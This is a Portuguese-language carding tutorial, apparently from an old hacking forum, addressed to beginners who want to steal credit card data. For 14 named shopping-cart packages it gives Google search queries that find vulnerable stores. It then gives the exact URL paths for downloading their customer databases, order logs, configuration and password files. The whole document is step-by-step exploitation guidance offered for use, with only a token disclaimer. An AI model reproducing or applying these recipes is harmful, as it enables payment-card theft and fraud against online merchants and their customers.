Tutorial sobre Carding
NESTE TUTORIAL IREI MOSTRAR QUASE TODAS AS FORMAS POSSÍVEIS DE SE CONSEGUIR CARTÕES DE CRÉDITOS, NA INTERNET.
ESTE TEXTO É VOLTADO SOMENTE PARA APRENDIZADO, NÃO ME RESPONSABILIZO PELO USO INDEVIDO DO MESMO.
TODOS DIZEM QUE CARDING É UMA TAREFA DIFÍCEL, QUE PARA SER REALIZADA, O ATACANTE NECESSITA DE UM GRANDE CONHECIMENTO TÉCNICO.
FOI JUSTAMENTE POR ISSO QUE RESOLVI ESCREVER ESSE TUTO, DE UMA FORMA CLARA E OBJETIVA, SEM MUITA TEORIA, POIS DEVE SER ISSO QUE ESTÁ ATRAPALHANDO VOCÊS.
[Indíce]
[1] Bug AspCart5
[2] Bug CandyPress
[3] Bug Cart Hassan
[4] Bug Cart32
[5] Bug ccbill
[6] Bug Cyber office
[7] Bug Ezshopper 2.0 & 3.0
[8] Bug Fpdb
[9] Bug MidiCart
[10] Bug Perlshop.cgi
[11] Bug ProductCart
[12] Bug Quikstore
[13] Bug SoftCard
[14] BugWebStore
-----------------
[1] AspCart5[*]
-----------------
Bem aki estou outra vez, apanhar uma grande seca a escrever um tutorial, mas enfim é por uma boa causa. Então vamos la, mais conhecimento ai para o pessoal que quer se iniciar no carding..
Primeiro vc só tem de ir ao google e digitar:
allinurl:/backend/ no qual vão aparecer uma lista de sites.
Depois é só mudar a url:
Exemplo:
www.fhp.pt/backend/xxx.asp ---> URL Normal
www.fhp.pt/aspcart5.mdb ---> URL Modificada
Bem como viram é uma maneira muito fácil mas eficaz...
------------------
[2] CandyPress[*]
------------------
Primeiramente va até ao google e digite: allinurl:/candypress/ e ira aparecer os possiveis sites com bugs:
Exemplo:
www.fhp.pt/candypress/xxx/xxx.asp
Se aparecer uns sites parecidos com isto e so mudar assim como os exemplos abaixo:
www.fhp.pt/store.mdb
www.fhp.pt/storefront.mdb
www.fhp.pt/fpdb/storefront.mdb
www.fhp.pt/fpdb/store.mdb
Agora se aparecer uns sites tipo isto:
www.fhp.pt/xxx/candypress/xxx.asp
E so mudar a url como os exemplos abaixo:
www.fhp.pt/xxx/store.mdb
www.fhp.pt/xxx/storefront.mdb
www.fhp.pt/xxx/fpdb/storefront.mdb
www.fhp.pt/xxx/fpdb/store.mdb
[3] Cart Hassan[*]
-------------------
Esta falha permite vc ver o lugar onde estão os cc.
Primeiramente va ao google e digite allinurl:Shop.pl/page=
Agore vc só tem de trocar o que vier depois page= por shop.cfg isto parace um bocado confuso mas olhe para o exemplo:
www.fhp.pt/shop.pl/page=shop.cfg acho que ja percebeu, entao que tenha uma boa caça
---------------
[4] Cart32[*]
---------------
Primeiramente va ate ao google e digite allinurl:cart32.exe e serão exibidos uma lista de sites.
Depois é só mudar as urls como se segue nos exemplos baixo:
Exemplo:www.fhp.pt/cgi-bin/cart32/cart32page-orders.txt
www.fhp.pt/cgi-bin/cart32.ini
www.fhp.pt/cgi-bin/cart32/cart32page-output.txt
www.fhp.pt/cgi-bin/cart32.exe/cart32clientlist
www.fhp.pt/cgi-bin/cart32.exe/error
www.fhp.pt/scripts/cart32/cart32page-orders.txt
www.fhp.pt/scripts/cart32/cart32page-output.txt
www.fhp.pt/scripts/cart32.ini
www.fhp.pt/scripts/cart32.exe/error
www.fhp.pt/scripts/cart32.exe/cart32clientlist
---------------
[5] ccbill[*]
---------------
Primeiro tens de ir ao google e digitar allinurl:/ccbill/ e aparecera uma lista de sites, nos quais vc so tera de modificar a url como o meu exemplo.
exemplo:
www.fhp.pt/ccbill/
www.fhp.pt/ccbill/secure.order.log
www.fhp.pt/ccbill.log
www.fhp.pt/ccbill/secure/currenty.log
www.fhp.pt/currenty.log
--------------------
[6] Cyber office[*]
--------------------
Este bug permite vc fazer o download da database
Para isso tem de ir ao google e digitar allinurl:/shopping_cart/view_cart.asp
A database fica no directorio /_private/ e chama se Shopping_cart.mdb.
Por isso o site ficava assim www.fhp.pt/_private/Shopping_cart.mdb
Vc tb pode procurar no google por allinurl:/shopping_cart/
[7] Ezshopper 2.0 & 3.0[*]
---------------------------
Primeiramente va ao google e digite allinurl:loadpage.cgi.
Agora e so substituir as urls dos sites que apareceram como demonstra o exemplo em baixo referido:
Exemplo:
Ezshopper v2.0
www.fhp.pt/cgi-bin/ezshopper2/loadpage.cgi?id+/ URL Normal
http://www.fhp.pt/cgi-bin/ezshopper2...subdirectorio/ URL MUDADA
http://www.fhp.pt/cgi-bin/ezshopper3...r_id=id&file=/ UrL Normal
http://www.fhp.pt/cgi-bin/ezshopper3...subdirectorio/ URL MUdADA
------------
[8] Fpdb[*]
------------
Primeiramente va ate ao google e digite allinurl:mall/lobby.htm
Vc ira encontrar urls como estes exemplos:
Exemplo:
www.fhp.pt/mall/lobby.htm
www.fhp.pt/shoponline/mall/lobby.htm
Exemplo de como ficam as urls modificadas:
www.fhp.pt/fpdb/shop.mdb
www.fhp.pt/shoponline/fpdb.mdb
----------------
[9] MidiCart[*]
----------------
Para variar vamos ao google e digite allinurl: meny2.asp e vai aparecer uma lista de sites.
Agora e so mudar a urls..
Exemplo:
www.fhp.pt/meny2.asp
www.fhp.pt/midicart.mdb
www.fhp.pt/shop/meny2.asp
www.fhp.pt/shop/midicart.mdb
---------------------
[10] Perlshop.cgi[*]
---------------------
Primeiramente va ao google e digite allinurl:Perlshop.cgi
O que vc ta procurando são estes directorios:
/temp_customers/
/temp_orders/
/orders/
Exemplo:
www.fhp.pt/cgi-bin/perlshop/temp_orders/
www.fhp.pt/cgi-bin/perlshop/temp_customers/
Isto pode lhe fornecer informa?oes interessante do site...
--------------------
[11] ProductCart[*]
--------------------
Vou agora falar de um bug um pouco conhecido que é o productcart.
As versões bugadas são a 1.0 e 2.0
Na instalação de default,o arquivo de dados do carrinho de produto e localizado em /productcart/database/Eipc.mdb
Que pode ser acessado facilmente por qualquer ataque remoto.
Exemplo:
www.fhp.pt/productcart/database/EIPC.mdb
Pronto é tudo que vc pode obter acesso ao banco de dados
------------------
[12] Quikstore[*]
------------------
Primeiramente e so ir ao google ( para variar ) e pesquise allinurl:quikstore.cgi
Agora é so mudar os "sites" por estas urls como amostra nos exemplos:
www.fhp.pt/cgi-bin/log_files/access.log
www.fhp.pt/cgi-bin/log_files/error.log
www.fhp.pt/cgi-bin/orders/
www.fhp.pt/cgi-bin/orders/1001.1.log
www.fhp.pt/cgi-bin/database/
www.fhp.pt/cgi-bin/cb/
www.fhp.pt/cgi-bin/
http://www.fhp.pt/cgi-bin/quikstore.....html&cart_id=
http://www.fhp.pt/cgi-bin/quikstore....0html&cart_id=
http://www.fhp.pt/cgi-bin/quikstore....0html&cart_id=
http://www.fhp.pt/cgi-bin/quikstore....ohtml&cart_id=
-----------------
[13] Softcard[*]
-----------------
Primeiramente vai ate ao google e digite allinurl:softcart.exe
O que aparecerá são mts sites e vc so tem de procurar urls como este pequeno exemplo:
Exemplo:
www.fhp.pt/cgi-bin/orders/*.olf
www.fhp.pt/cgi-bin/pw/storemgr.pw
-----------------
[14] WebStore[*]
-----------------
Bem primeiramente vai ate ao google e digita allinurl:web_store.cgi e aparecera uma lista de sites:
Nas quais somente vc ira mudar a url como no exemplo abaixo referido.
Exemplo:
www.fhp.pt/admin_files/order.log
É isso ai
Do Melhor
Linkk
del.icio.us